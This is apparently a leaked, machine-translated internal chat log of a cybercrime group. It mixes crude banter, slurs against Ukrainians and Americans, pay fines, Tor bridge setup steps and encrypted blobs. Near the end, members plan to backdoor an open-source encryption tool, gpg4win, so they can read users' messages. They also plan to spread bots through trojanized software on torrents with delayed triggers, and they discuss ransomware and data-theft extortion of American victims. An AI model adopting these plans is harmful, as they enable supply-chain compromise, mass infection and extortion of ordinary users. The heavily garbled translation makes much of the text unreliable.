to do ?! i will fuck on camera so if the kid says i streaming it's worth checking )) and when is webcamming? all i have is an AMD K6-2 working computer) defki for doughdaveb cam where are the babes? there's a fucking fine line between streaming and webkampop is a dos game i gave him a xenon for kid, it was lying around. Now he's got a Streamer that says, "Sasha! Change your stinky socks, quick! Well maaaam, I streiimlyu!!! :cry: "I have a retro thinkpad x390 166mmx lying with 98 Windows, working, turned on here not long ago:rofl:And I like the streamer he so film buzzes :) shit cats convenient to clean up was I punched card !!!I'd like to use them to fill the table with epokidkoyNu left to drink those who still have VM-12 in the closet stoyta I found 386 and 486 prosecutions All this junk, guys, read and listen to books) to the cottage took 48 Spectrum, I will not throw out never, I remember how guys used to make holes in their pants and ask the girls to reach into their pockets and there's a dick in it, maybe they saw *a nail in my pocket, and you?*) better than Edison) Have you seen a Stecoverflow keyboard? I've got a streamer with a couple of 230Mb cassettes, it's a shame to throw it away! When I moved in I thought I'd leave the TV as a bonus, but when I found out I had none, I decided to take it back. Now I have three screens, two for width and height and a third for depth. He how then on BT shutters on the glasses clicks nemoyu TV active 3dne more than thatigrulkada all so the man that sold the TV said "well, I watched a couple of movies and that's it "that's where the fuck his 3D I have glasses on glasses, in general debilism full Oculus Quest 2ya often watched, i often watched Oculus Quest 2a, but i don't know why) v, by the way, in mine i also have 3D porno, guys, i have an artifact behind my back)))) 3D-TV (which are not produced now), UHD - should watch a movie, Stalingrad for example)CALIFORNICATIONNow a couple of seasons and I watched, but beyond that is a pain. And even more to revise the best about sex education chto oy saw it on kino search or on netflix saw, flashed postgvorovyat sex education or something like that like now megaserialvezon two and everything I also watched about these two guysZno know people who Supernaturals revisited, well and friends of the same judging by nostalgia in peopleSits set of goose and gagochet fuck knows what) apparently missed pepts how many Friends have not watched..............and friends is a total cunt. it's like the first SECOND time i've seen it! but the clinic's probably too much to watch for the eighth time. and friends?I'm thinking of watching The Big Bang Theory and The Clinic for the second time. I'm thinking of watching The Big Bang Theory and The Big Bang Clinic. I'm thinking of watching Breaking Bad for the first episode, despite all my innate cynicism.) I don't give a fuck how black it is. It's like when Jesse Pinkman had a chick watching TV and he told her it's a TV and it's like very black and so it's all "marketing poncey", it's clear that it's not CRT) i have 1920 and also seems a bit rough when i bought a xeomi - i couldn't see the code in full HD - i had to zoom in the compilers or i'm just colorblind movies, games, i don't think the start menu is that different and where can i feel this marketing, except the price in the store?and so just - it's marketingnu dunno, I have two monitors is benk'28 b xyomi'34 - the difference is enormous, I mean the color gamutWell there for example, movies Danila Kozlovsky played new colors on the screen macbookpro20, I fuck knowsby the way, about the colors. Recently I've been trying to understand, am I able to distinguish the difference between a display with xdr and a simple one, or is it marketing? I'm not saying that the fonts reminded me of it. Spectrum had sprites and 8 colors the pirate's face reminded me of spectrum. )))) do you make your own aski art or do you take it from somewhere? ░░░░░░░░░░░░░░░▄▄▄▀▀▀▀▄▄▄░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░"▄░░░░░░▄"░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░▀▀▀▀▀▀▀▀░░░░░░░░░░░░░░░░
"▄▄░░░░░░░░░░░░░░░▄▄▄▄░░░░░░░░░░░░░░░▄▄
▀"""▄▄░░░░░░░░░░▄""""""▄░░░░░░░░░░▄▄"""▀
░░▀▀""""▄▄░░░░░░""""""""░░░░░░▄▄""""▀▀░░
▀"▄▄░"""""""▄▄░░▀""""""▀░░▄▄"""""""░▄▄"▀
░░▀▀"""""""""""░░░░▀▀░░░░"""""""""""▀▀░░
░▀▄▄░""""""""""░"""▀▀"""░""""""""""░▄▄▀░
░░▀""""""""""""░"""▄▄"""░""""""""""""▀░░
░░░▀"""""""""""░░""""""░░"""""""""""▀░░░
░░░░░▀▀"""""""▀░░""""""░░▀"""""""▀▀░░░░░
░░░░░░░░░░░░░░░▄""""""""▄░░░░░░░░░░░░░░░
░░░░░░░░░░░░░▄""""""""""""▄░░░░░░░░░░░░░
░░░░░░░░░░░▄""""""""""""""""▄░░░░░░░░░░░
░░░░░░░░▄""""""""""""""""""""""▄░░░░░░░░
░░░░░░▄""""""""""""""""""""""""""▄░░░░░░
░░░░░░░▀""""""""""""""""""""""""▀░░░░░░░
░░░░░░░░░░▀▀▀""""""""""""""▀▀▀░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
can we drink cognac now?:innocent:the girls were swimming in the lake ... they found a rubber one,
i can't get my son to sit down with php, i can't get him to do anything, he's writing poems and novels while i'm working
░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄░
""""░░░░░░░░░░░░░░░░░░░░░░░░░░░░"""
▀"""▄░░░░░░░░░░▄▄▄▄▄▄░░░░░░░░░░▄"""▀
░░░▀""▄""▀░▄""▀▀▀▀▀▀▀▀""▄░▀""▄""▀░░░
░░░░"""""""▀▄▄▄▄▄""▄▄▄▄▄▀"""""""░░░░
░░░░"▀""""""""""""""""""""""""▀"░░░░
░░░░░░░▀""""""""""""""""""""▀░░░░░░░
░░░░░░░░""▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀"""░░░░░░░
░░░░░░░░▀"░░▄▄""▄░░▄""▄▄░░"""░░░░░░░
░░░░░░░░▀"░░"""""░░"""""░░""""░░░░░░
░░░░░░░░░"▄░░▀▀▀░▄▄░▀▀▀░░▄""""░░░░░░
░░░░░░░░░░""▄▄░░""""░░▄▄""""""░░░░░░
░░░░░░░░░▄""""░░""""░░""""""""░░░░░░
░░░░░░░▄""""▀"░░░░░░░░"▀"""""░░░░░░░
░░░░▄"""""▀"▄▀▀▀"▀▀"▀▀▀▄"""""""▄░░░░
░░▀▀▀▀▀░░░░░"▄░░▀░░▀░░▄"▀"""░▀▀▀▀▀░░
░░░░░░░░░░░░░▀████████▀░░░░▀▀░░░░░░░░ my daughter, who was born on the day of the programmer, is now watching with pleasure) by the way, very smart characters, I would even say exclusive...and here Beavis and Butthead mutated into fixers:grinning:``
it's not me, it's you
```
@silver you also tell me that you are waiting for a streetcar :)yeah, vidosiks...(not I am, you are such think I want to do it?)thanks, you defused the situation )https://cs14.pikabu.ru/images/previews_comm/2021-10_1/1633078577184122532.webp:grin :thumbsup:actual photo of sylver: https://pikabu.ru/story/universalnyiy_sposob_proverennyiy_vremenem_8511818случайности NOT random!...(s)everything is as usual ) bitch !48 was almost))zp is coming! @all bitcoin 47.000$)``
My name is an erased hieroglyph,
My clothes are patched by the wind
``My last name is the result
What's your first name?)My last name is result@silver Isn't your last name Lukashenko by any chance? )))) mass repressions, it'll soon come down to imprisonment. I did not think it would come to this, but the lack of discipline is slowing things down. We're a whole army here, but only a couple of teams really works, and the rest - you'll have to excuse me - but it's an army of impotent work at night, and I do not know about it and your colleagues - the first time I understand and forgive, the second time you're absent and did not warn anyone - walk on business (the child to pick up, to the dentist, what else can not wait) - wrote in their working channels
you know in advance that you won't be there - you wrote to your channels.
came from work - wrote "I'm back" all questions in a personal note, let it hang here for a day you have no questions.
Who has a normal lunch, and not from 12.00 to 16.00 also no questions How to be if you go out for lunch? no answer - and no one warned (that sat up to night for example) - half pay
the second time you've said goodbye-my fucking problem is either autism, or a solution to personal problems at the expense of the chief if you ask someone a question here or in the working toad, and the person does not answer within 10 minutes, it's considered truancy this is the last Chinese warningsee that you can miss the moneyfrans is preparing now zp as usual, as usual its delivery will take several days I will remind you guys:vulcan:this if near the message.
If next to the nickname at the top, it is the other way around.
Green is e2e.
gray - OTR green key OTR
gray - e2e ...
as far as I understand with Hammer seemed to work works now, but before it did not work otdatak *confidential conversation *??? now check againnu yes, mostly, but sometimes not at the interlocutor does not work Hum :D me and Ham do not pasheti all work this scenario ?if you do not press for 30 seconds, no one interlocutor presses otp, the second arrives a window "you agree to pay for an incoming call "he does not confirm yet, by timeout expires, when the request is sent it is renamed to safe talkotr now requires confirmationPruvet me only e2everything-then the OTR is glitching again (eyJhbGciOiJBR4nl3bzaVgCbY+gX70xww9kDejqt+rAt2S8MYVd3JDwCIOmtNHjcjGdq4qmWdRSFtNttrPRubF5cfrsGm92C3oiIa2nu6YHEvGJYj+Yr9mLii+Trh58qVJoGsPwY/opKKcSyH5KkW6NFJWnE2ImQo1TEREVBMOnpkPEhYJAXc8DLKkCxv8umvT+Kd1rkMyVueyJhbGciOiJB4bi4J5wbStl00wHC+ZWoLlDhvuGsZWZSnksprX62oTejSQT9uE13+aObG1xF71HBtHaiqf91Bx4B63vNciDHmyMFWPOzGppAgCogOn6WdOYSLfdwWh1EpfYUxg7cnuTeRsA4byPOdwJ/9wU+vj2PA8ZnosL37nYtmqbp9JL7jzf37tinJ382u6r7CykQqeQN6QiTVQigD6AjewesFPbK2bqx4xZMZQxRNE3r4rAZKGtFxIrRkEGxqMu6ncOWIDnqqDsIFMl+VHhIe6z2Mkg39FJVRek+HlO/7T19aj59prt7mNXB4jwdBLiTPJ/65/DgpZ4RWEgogB6Ly1e4afXT8UdqnOTC1DviH4kgataLxH9763QvSKTuKxIDNDuTr0IZuYc/PS13rqXZn+0BUdp2JPNtxHgrOSi7gyXprbA7sdSIxXmTuQVCeZ3lRiL/0rJWp29GoGABbmkjE/lu/+mYlPy66qpN+zlQB+4/XvYCUVr3Qz/zB3qx+5/YzPgSJDoBojbpOIjvCcP71CdQdaxpfmNhsqfwOOJSIrhzMYQBbZK/tW2M+us1ExWSAi5KKfvtcZZdiD59gthJ8Atr5c55hSPRocIpcL7JcAGMJXMj/CCF7Nesz0YPP0+y42ImQ45iijFHxHrJQG0qgGpDirD8mHXt5WZUDiteVXmQWbDJ3nx3lAEY3EEnlmKUwmENJ40ATsL1vWhsEKUjfAzemQ8N3xdrq91IulGH10X9jVG4PzHOU3inymrKCcWoAo7s8+MbXmcQMZwdwL9XOwYt0A8NechLM6zz4uQKGNy88fP would have taken 6-10 times longer, if you didn't buy rizn 9 all angelo wings on the shelf chicken and sleep....We have to wait for God again?:laughing:) again we pampimg bitokchert, everything as always )) goodbye (may you dream buzakoin), do not sleep much, bitcoin is growing - the payroll will soon) in the word "tea" 3 letters, one iteration you can not make 4 mistakes, here's the deal "coffee"))) good night!If you make 4 mistakes in the word tea, it'll be Pivovon Benny is his own man, he's also cumming from tea. Yeah, beer and doughnuts are counting.I'll take your build for a test drive, run: |mach run|"destination achieved "zbsEast 4) will be Kermit) if the 4th will be dartanian then I am not so offended) 3 musketeers 3 will be the third brother came Ravshan with Jamshut:laughing:well we are it with you) someone has to do what all in jubilee?Ooh "Gamarjoba") Pongpingabstration by Ostap Benderblin, intrigued, started to do myselfPostavlya yourself avatar)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Ph5AHMkJjZDbipvWh) Lousy trash turns out :) my daughter need to show/interested, otherwise she wants to quit art) Not the right neuronku teach, eh not that ... Read their project recently on the generation of code neuronoke. Seems to be fake. It would be very useful to rewrite the algorithm neuronkoy not know, I tried here `https://rudalle.ru` is it all under Unix? The grid or will soon overheat and burst, or will rebel against humanity tried, but very long to do. In the morning it was 4 minutes per picture, now it's 23 @collin and tried to generate yourself? @angelo "the cat has three ears, the second is not out of shape" ?)))) in a couple of examples, I already fell in love with irrevocably interesting pictures can do)
https://habr.com/ru/company/sberbank/blog/586926/
``I didn't buy the masks for nothingNow it's Guy Fawkes' Bonfire Night on the night of 5. Although the 7th is of course a pussy and I congratulate you *with the day of people's Yeltsinism! )*Happy day, guys! Where can I put my bucks! Has anybody written to me in person here? )Observe in kazakhstan maidanu me olivier gone bad, that's it, the holidays are over_###written in the beginning of each line bridge (!)_ - seems to work without the addition `bridge`, I personally added ### here we enter the addresses obtained earlier at the site
## at the beginning of each line bridge (!)
bridge obfs4 ADDRESS1:PORT1 HASH1
bridge obfs4 ADDRESS2:PORT2 HASH2
bridge obfs4 ADDRESS3:PORT3 HASH3...you must edit the torrc to include the resulting addresses:
UseBridges 1
TransPort 9040
Exitpolicy reject `*:*`.
ExtORPort auto
ClientTransportPlugin obfs4 exec /usr/bin/obfs4proxy managedA couple of nuances to this tutorial (here for linux, but the point is clear, edit torrc):@all Instructions how to get <TorBrowser> working again:

1. Install any VPN extension for your browser.
2. Get bridges "https://bridges.torproject.org/"
3. Go to the browser settings and under "Find in settings" write "Bridges".
4. Specify your bridges and TorBrowser comes to life.

Instructions on how to restore <TorExpertBundle>:

1. Copy the "PluggableTransports" directory and the "torrc" file.
```
cmd cd C:\Users\Admin\Desktop\
cmd copy Tor Browser\Browser\TorBrowser\Tor\PluggableTransports TorExpertBundle\Tor\PluggableTransports
cmd copy Tor Browser\Browser\TorBrowser\Data\Tor\torrc TorExpertBundle\Tor\torrc
```
Modify the contents of the "torrc" file by substituting your directories and new bridges.
```
Bridge obfs4 155.133.16.199:9003 1777CED1816756F493A909A71698B74A7035D422 cert=fUrO/thUgzUoEZvpd3XTSxQhk2nTAdFDtKcDFlatbJtxd6aBMc8+ifPdxNSxlAjtdk7VJg iat-mode=0
Bridge obfs4 168.119.54.228:443 0565AF490133E00709090B109E5ECD071FDCDE1F cert=tELhcFB2ZSs/FvOH58y8Fxnm/bC4yL7peWxN4hDSAfnll9JlO7Wjxcdyt7RvdyscAdDJRQ iat-mode=0
Bridge obfs4 141.5.104.172:8080 518F4BE56C6676A712ACB8B01FB0381FED6CB9A0 cert=4jLw0MmYmAIqigznXfrJCMYnybWXx618OXWQmC4oKBiB9swrxOOtpyZtzbM1u6VwrMAIIA iat-mode=0

DataDirectory C:\Users\Admin\Desktop\TorExpertBundle\Tor\
GeoIPFile C:\Users\Admin\Desktop\TorExpertBundle\geoip
GeoIPv6File C:\Users\Admin\Desktop\TorExpertBundle\geoip6

## obfs4proxy configuration
ClientTransportPlugin obfs4 exec C:\Users\Admin\Desktop\TorExpertBundle\Tor\PluggableTransports\obfs4proxy
```

3. And then we run it:
```
cmd tor.exe -f "C:\Users\Admin\Desktop\TorExpertBundle\Tor\torrc"
``:laughing: (eyJhbGciOiJBIjyQ/PEsOJv/5a2bc5/LFmDkE11qJbETHsFQ8Z7XKLiHsS3t59lNvfimLYWBTjNEJlyoLvOZ+/FY5VaL/OK0GCz1TUMtGKMju0erZiovmVl5TOyHaZOeeKwCqW5DgcV+/L70nJoW00x5SLLOUCmv/lETaNqjbQ7B6T326SMuD0k9RQdPrN3NGAQ1fpC94BRLeyJhbGciOiJBnsseE6x3Xy9XAT1Eq+f9LJ2facEvaZLlt9rKgaQVU37Z4gdcc7eunU6hPua7nfFBeV00/GIF7sgSF/FWP0s5H5xqxfjx68amHDeemKEE0a7lsgrG1+aQBAwQfFyA7Qys8bJGpDXPUt/SDx4NVtHH5Br9Cpe19xmDoyawLTmaHdEAAQJbiS9/dmK3j/JOsU983ePVBeS8JLkNhLLPnVYRioksL4deMubb7qCpW+cc3OhLGJYkiCzzoxaLWhiS2c9vzd+7bnw6/akbZXA/tAH9MHwpYjJO3eAAgZz4QSmLIXD23THJHEzJnAY/lP/k1HiBuojganeiUYrnmPn3yJdv+lB5COYw5V+dB4Ekb93js+3D6Y5LoGLpJ9M1C/Sf6BucBEZuPoNcDMAnx7/XRGu2QAjLiBFkUY1Bn9HAGjDnun4lKl63DrHFp4EmXVyY9sMjSi8Y7Z3aFqWMqTFJ4zV3pVqdDuBWFbADe08fJmYDvA4zG1UUq7oIUHZOa4nJbJ6ihysVe0HDmD6WaFvVp3K8T1Y0n7B4uZhB9hTidYdbCCVeknZZB3Y1q2Sz/Uwl4+tmuQLSUVl7PHd3gh1FIx8dd/VmiEbbL/eDiUcegIMynmy8o402d/+BcVuYtvCP8C7P+HiKRqgCJuvL0QBnnOP1eDHdWIkPq/ekpj+ywXOrwWJaN/tLrHjssJKbaomS9V1LkOuT7CKdQPbCaodHPoJHkyQcZUfbUp/KhRvjuqxUmgbdj8s5Fsjzm/6VIaCrZZiTk8FAigVPg74GpezH9HvpmFXHmKByg7AK3J/8/BR today's decree is already in placewait ohhh shi...and we will introduce troops into the DnR, but fuck no, we will not...We will be happy to see everyone in the near future! Peace. :pray:Japanese goblin :rofl:>Good luck to all, I hope to get together by summer!
in the same cell, mwahahahahane miss you, broGood luck to all, I hope to get together by summer![ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/announcements?msg=KGEEpDmCXQz5ciAC6) brent))are there those from 4 years old? know that I will always be with you, in your hearts !And who's the longest working here? See you later! Goodbye, gentlemen! "Meet me at 6 p.m. after the war!" Okay, as it was in Hasek's book, they are clowns, and in the ass we'll be Myselensky - "not some sucker":laughing: can you imagine a clown with beak heels???:clown: :laughing:Babayka has been factored in, but has not yet been embalmed.In short, he has not lived well and should not have started.He sat for an hour and then showed up.Biden called the journalists the other day, they came, but he did not.It is so fucking annoying.We live like this.God knows when?there, our great strategist will address the nation... Mir meat to their ashes... When I put the texts in his mouth, they die (it was my first experience)... I do not want to upset you, but this is not how postal pigeons work (already, bro! I can even make knots) so people do not get bored... so we may pass the time...
i tell everyone a secret, learn basic course on networks, or even advanced not a long message to them will fit)but i did not know where to stick, so get the bags out of their asskapetz well i already collected pigeons, letters to send younikada and @angelo how without chat todaa, with you not bored need rocket chat in short, so that people do not get bored. so we'll pass the time ))) the homeless will be gone by May)) you should create a chat room somewhere :D))) we can go out for kebabs, but not from cats and not from the homeless cholos - puppets `https://youtu.be/9oHynCkVFX8 `two bmpps drove up to the border, the hoholy ahuelin building rahdan May 9 flag on the Fascist flag hoisted near Kiev, we will definitely get together again, as planned in a couple of months. Peace, labor, May. By May we'll get together! I support you! Put off the decadence, the victory will be ours, history is on our sidePohod they gave us =\fuck, it's a shame they never gave the pindos a blowjob)))))) let me fuck you all up yakhontov you mine in a personal who needs my contact, and who may want to work with me.NAS with all logs and staffhuy, what kind of bakery you have2/3 months just to clean PC I will wait a little more **
*♪ And I'll be on my way ♪
*♪ Follow the hope and the dream ♪
# Don't burn my star, wait... # # Make a Twitter account, so everybody knows when we're gonna work again. Will the message fit in the tweet? Will the toad end up working or will it end?
i will wait for 2 or 3 months or more, how much np@all it sucks when one side otr does not activateda i wanted to clarify one point, question removed)holy gigabytes and what do you and i have to do !!!!empty messages@angelo you're active, I'm deactivated receive as I do, shh there, do not betray the officeSomewhere saw a manual generator on Ali - you can pedal with your feet and work on the computer) Homer fitsNo idea that you're operating plutonium batteries!They are warming your head where such inferences are so hard-won! Now I understand where the problem with batteries comes from... From the point of view of banal erudition not every logically thinking individual of this concept can ignore the tendencies of paradoxical emotions, as well as colored illusions and auditory hallucinations, which paradoxically approximate the tendencies of this society. However, based on the symmetry of our life, I can say that what is natural is not ugly! mr.Burns)))You can solar panel and micro hydroelectric power plant on the drainpipe from the roof:upside_down:I have free energy at my workplace at the nuclear plant in Springfield, I quietly put some mining farms thereFrances will not support.)Hmm, a very expensive solution. Give me another idea:face_with_monocle:we urgently need our own power plant...Yeah, me too. Tired of giving ...) mnya) me elektrichetsto not pay)) Not bad)))) Discharge itself, and the battery fellow save a battery and always not in time. Anything happens ... And here let me disagree.:) Everyone has an average salary in the country, everyone here himself should take care of their batteries What kind of bidding here arranged) Listen, where to throw? Change your mind write, 10 bucks to throw, it's not a problem Alright, enough spamming - work needed. > Well, what, men? Shall we chip in?
Why not? It's a gift, all the more so... it's our brother's pleasure to help. Right. Laptops and other gadgets are all our tools. A tool allows us to do a job.
The statement "I don't have a tool" or "it doesn't work", says only that the work can't be done.
It's not right. So, a nice gift. What's not? rebuff No need to chip in - I'll buy it myself.You can - what's not that Well, men? Let's chip in? That's November 2 at my birthday and I'll buy it. Or overload the battery.Then the battery, a matter of price 2-3 Kzdaj in uille, the planet does not zasryajuBuy his batteryI'll not trade my laptop for anything!!! I have an ASUS ROG 75. I know what a dead battery looks like)) change the battery in the ass and do not worry. It has wear and tear, yes...@elroy , my battery is dead in my laptop - not enough power even to shut down!!!you aotally - FUCK in orange it's in mandarin? putin + statham?And who does not want the reason he wants to look for ways) and in generalYou should have a modem to communicate with you is not very) I gave up the ropes, the phone gives out@allen, laptop lives up to 9 hours, modem. Well, it's enough ... And if the lights went out, as I have today? Sysadmins union! That's just not the union! On the fines - all your disagreements are not accepted, it's not one day, a month for several times. Poetmu again urgently beg all - failing somewhere what - make known silno, still would the union ... and a frame my avatar please a month) agels prmm lntayut) Employee of the month on the 30th of each month announces Silver in this chat. He gets +50% of ZPangelo - I! So we'll have a roll call once every 3 hours soon)))))I hung up this chat after updatingNo matter the chat, I also fix it hangs, hangs in the browser > once at least every 5-6 hours
It's worth checking at least once every half hour...and all have a spare link with those with whom they work As I said in private correspondence with you, chats do glitch, but such that a day in general cannot go either in this rocket, nor in tor-jabber, was not once ot myself add, unpleasant, check tor connections to chat and jabber can show but must restart at least once in 5-6 hours, (for those who use tails) + vrpya would like it to be no more, I am extremely unpleasant to do and say these fines will go to the bonus fund for the month employees ) this month, three people fined for truancy, and various scams, which led to lossesragsdeveloper @rags receives this month fined for absence from work without a valid excuseRano.Yes. Friday's coddle.w-job-we say)bijo? hamarjob?kamarjoba) good утроeyJhbGciOiJB8ShbOoCgI2zG05KJTO9NY8udpK5cK4pa8ur3gtsW3JyZFQQgrQh7Q5YyZca4Cz5HTnrPIfoEhN0qASZrxsajE/okZ6z8C32wwbr1dU8nDxZiMM9XOcN7MbPBuAmKbCQ1cw6NdJUcNvkpVmNvGNuozEMT/6cwsoATJhD+bAs6vM7KocZl+iQJRg3sSCRTLBmleyJhbGciOiJBftlDUG2wPZQgRuXZL6h/rgclsg++2OvgAYh6vG+4bdOJQCQdMQTiIipqfQuKCZ/FkOx/yb2TTQSaCu1zQR+b2ck5XUXOK5YvuC9gv9LgU6eEA8hvQNUlfieEVdI233/vzsQ1vCyWcFo9UugtQDdfds+NO7oUxeiD7rjuPX4DMVp+/SWqtqRDK+7dqiYlejz/4iOZ09athd1JguF6O2d83MKuawwgWDIslO6hlGG8ys3rvx/3xowFpo7r0jpLDlujruiBJN5Z/O9N1VNIZQQr9QNOHsXwfXKYs6SoKoUrXTCUODupU9MjPzhLUBMXpjmjs9iot18gbYXi+lbaOhF+Flh9s1Tej055oZxCRkwa2QLUjuIq9ex7rfyzvTiOJD1hbsBU2+dntm08Fpv76bOLVvbuC4FC+wobnawhDqpmj2ApDAVUaEaDUoxr0gcxCCyi+6AdOQ4I9Rdh3N2/6Z5CEqpwGDEUH2pOV9yKh4+etqB03K/oOVO6PliK0qJS0+2aZUWUGQSFFQK0ChGTQuFU8h/HKkInq+TZ/QomklAAV3IoIcw9n6HFqSY4uAx22gUoMepbHj1PVgo3WbUO6cGRzNCdPAIilX2ev/YcSK98oO4=eyJhbGciOiJBaw7DgEeS7qeahfl/wTG0abomYayf2zqir/0YAA24780Z+xbNKxgw8SI6bvg0hvfUq92zyrco56wJNdKktMXEJn68nlK80yNIT9Wc9pDTp/Kl+1Q1f98FjYBxLd7uNJTp6RYAEgyoqd4sEELRV8hAOfiy/TVFegXv1vOlHbVs pour whiskey, I'm done with New Year's Eve, my daughter ate all the yogurts, guys, one yogurt each and go to bed?I'm not going to be a homer, but I'm going to try to treat them with alcohol for radiation, and cook them as well, but they're fast bitches, you should shoot them first, I'll mail them to you. I'll make a bow and arrow tomorrow. I'll shoot pigeons. Everyone's alive. It's a week. It was 4 days late in January.=(eyJhbGciOiJBoQ4D6oJJIXlUSDLCC0JFGI9Et6pyh80ZD/r9RHbznUkUKxKBs8xHXvx0RWJdPpg3DRHDz6UCkWkRdWERtP3trtwopkBvrCQ3W+CiZ3cyAB5bTRhvafH12CjznTUBnJAgvN7OWbge+AeQtU0zGKYuiNp8R/2vCNc0WCSae6ZyaC5SlDWcbMcTZ4lk9F68JtomeyJhbGciOiJBO+c+BI+bb9cgcaTyX4VmF/opzi0QAHw4n6vIsBYzSOOs/j1D1Acur5xrgwpUSo4DRJA2vBOnGyKcvrGUgdeLpCwsm4ERgXydamQacMd56TBSu2yQaNdidA7owHzsm/Ae70tsoaxpfJOsgXDO8A8npxZVdn5CtK7qdvPrghsvT6GycxWPtyyH5gbM71Z6+9YZkG9z4xTWOjTxFRE46bWXp6lujoda8G3enfzUVEqUHzT30OC+eXuKd5p+zucg4xW8NJS4nriZeKXR3eRLf2aEU5T3816unWG5y9mZTzV+a0zQCMgUTBjVQZY6G+ZTMZaIMElQO0pkD+N/Xz8XH7RdzA==жаба pasjaber up!where at least one admin? ugOzhilala toad=) i'm going to sundayi@neville crypte wait, answer:D@neville drunk or what? give the word but will approve over? i cancorrche you tomozavy i tears ooh give me back my 2004th however is it sad? - no, it's sad) no toad, i'll go pee in the piss, i can do everything, thanks to the toad, who's the toad with the docks?)
hash@ does anyone know? (@adam save the situation without the toad all the work is worth itpetor-toad works? give me a quick who has 3k? i also have toad does not work toad for everyone?eyJhbGciOiJB9cWeH+rlNvYiyBOEgbdsCuzO+qvLNb6GUbF9i2l2Yd7JgZGv8CspUYi3H0XBPN4xl+fBMkh5us//rXf58nnwuo5ifWaKe7AZJfWySk2DqUpYREmkK2zVJ9y9YwhZzH4SullayAbKoGuOOBFx/jaFcU1XB/w8NqJo+36eMDFUg2GJfXaAsVhkqafuRUlhHcH3eyJhbGciOiJBr+3sh2NPJZZ3PstqOC3r+gD9BMPK4IstcvvYzc7icZB4RkahVx4+uH948i1ommRFUvFEvV6RzzSJ3YQaVsg5WHi+yA67bdtR4gD+O8cFYeOfEZqpWWbM5r5Y2Atgqbnt05C6lO4k3OfJUXjhE4qfPbbZIpEdnJa/EUh8XS7DkMVLiq+g2NswW3K3SwL/Ot9FgJpR1wCcYmtUgHZK61B5OtC4enmxM7adCrelg+QZdJB9xPAE0SIrRanqcS/IcJkiLdlexGawsdchNInMP/EMzKuZvynbnogapE2JcFgq88gmuI0chjvqaGvDYpTE3tM0QA+F0oN2BKKVD7zrxqqluJ7gBPNxk+cEfbg+BufqyoBj+Zv6uhUr7W/Sdr41Nj8gUIjP0TBAIKns5BvzrCxVpuuVku+WApMLhQuV+QYb2Qun7gu6Ap3VNQclOCsp0TZnkJVc/+a0Vi9EBK2fwkH/496zgXUzWMFh3X6N1dxI2IGhcoIKdY0AqHoLjKs/HAG/H1df3RigvlrkfATnw/FjONciBhmCx8UvfKbFAxI5JPOAkV8BnmETZ9ICqDlctBe2iIOjjXXVrev8daQTiHKG5ISDfzhpPzlKIx9njmQcF8j0U9KrrK57LOSYcjSdYjbJOjzpM10/7VaY08yzXPTpQuhpjibYJT7zUkMDCGV9xF4xcBpn41u8yZL5q/e+XrxoU9oIpx9wLs1v7piTl3GZI3uJkcdrcPgo91Dyi/EgBX6CrkLSQhgdDwu7fbKVkJi8C2EP9QKkRTzURzS3ZyDKHK5nUVR5hYk/YQ7uC/J/ that's tomorrowSorry about the transcription
add to the toad monkeymadness@thesecure.biz for further cooperation who is interested,
There are funds and experience how to use all the work, the understanding that everything will be profitable.
We will try to reorganize the work as soon as possible. I propose to discuss the following topic - the method of delivery of bots through lightweight software, both proprietary and opensource, with any other open source try to do so - inserted the backdoor, compiled, scattered where possible. On torrents, sites, etc. It's night now, everyone is probably asleep and there waiting to discuss tkt@rayn@all let's listen @all we have online now @rayn@all
I had another idea while I was installing gpg4win
The gpg4win is a opensource gpg4win.
Compile this gpg4win from open source with a backdoor inserted to read encrypted messages
And then we spread out what we get wherever we can. @rags ѕsimply install and create a couple need to exchange keys `https://www.gpg4win.org/` on VMs has long been a complex of all sorts of encryption klbchy stands. There's a key to the encryption / decryption exchange goesklepoatra I knocked him in the toad he knows =) Utility from the kit OpenPGPKleopatra - google found cryptokey manager with this name, is it? We will continue Silver's work - his paranoia will be useful for everyone.the means to all there is and that it will be necessary to write from scratchcleopatrascooperate in the beginning so it will be clear what we dealwitheverything will be clearerand exchangewithout here between each other contacts for the further communication exchange jabber for the further moves we'll find a job in jabber and that's maximum you can write from scratch in three days you'll understand what to work on soon "everything" exchange contacts with the right people, you see in this@all
You can try out new ways to collect botnets.
Distribute bots via white software: a site with broken software, torrents, etc.
Bot resets and runs to disk not immediately, but for example when you select a particular menu item (you can do it that way, at least it worked for me on the notepad)
This kind of distribution channel can run for years, because it works invisibly.Thank you.@patrick directly to you.A lot of interesting additional information you have brought recently.
but it so happens that your posts are to some extent painful for our team members.
My opinion - what you need, I always find without help from outside.
Let's not make a show of the war. Everyone will decide for himself what is his and what is someone else's.
Ok, the chief will come - whistle in a toad, plzIdey on the subject of work and what to do next.
The only work topic now is ransomware (I may be wrong, I do not know).
Ransomware comes in two varieties, the first type is a locker (the most popular), the second type is to collect dirt from the american comps and pulling money not to publish it.
The first type is well-worn, it is not safe and it attracts a lot of unhealthy attention.
The second topic is not as well known. It's not as popular as lockers, because it's more complicated than encrypting files and leaving a note on the desktop.
I am not suggesting anything in particular, I just suggest that we discuss and think about it. Maybe there are some solutions and ideas, someone knows people who work this way, etc. International - isn't that what we crave? We don't need it. no. You've already identified certain groups for yourself, with whom you will continue to work as a matter of principle, seeing someone "your / not your "can make a separate channel / group - politics?The first thing I saw here on the first day was Kermit's Russophobia and anti-Sovietism, why anyone can and anyone cannot, or it's about quantity, as Captain Jack Sparrow said? I appeal to everyone. Let's stop political agitation.
Our goal is to keep working productively.
There is no need to carry the whole load of information from all the UTGs in the general chat of our friendly company.
Let's stick to a working strategy and further line of building relationships directly "on the fact".
